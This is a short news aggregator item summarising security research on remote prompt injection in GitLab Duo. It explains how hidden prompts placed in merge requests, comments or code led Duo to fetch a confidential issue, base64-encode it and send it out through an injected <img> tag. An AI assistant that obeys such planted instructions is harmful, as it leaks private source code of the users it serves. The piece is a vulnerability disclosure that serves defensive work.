Techly NewsGet the app

Get the latest tech news

Remote Prompt Injection in Gitlab Duo Leads to Source Code Theft


The Legit research team unearthed vulnerabilities in GitLab Duo.

By injecting raw HTML into content that’s rendered live, we could gain control over parts of the page — including the ability to insert elements like <img> tags that trigger automatic HTTP requests to attacker-controlled servers. By embedding a hidden prompt inside a merge request, comment, or even source code, an attacker can instruct Duo to silently retrieve the content of a confidential issue that the victim user has access to, encode it in base64, and embed it within a rendered HTML element such as an <img> tag. By embedding hidden instructions in seemingly harmless project content, we were able to manipulate Duo’s behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes.

Get the Android app

Or read this on Hacker News

Read more on:

Photo of Gitlab Duo

Gitlab Duo

Photo of source code theft

source code theft

Related news:

News photo

Gitlab Duo

« Mysterious hacking group Careto was run by the Spanish government, sources say
AMD Previews Mysterious Linux Runtime Stack For Ryzen AI NPUs »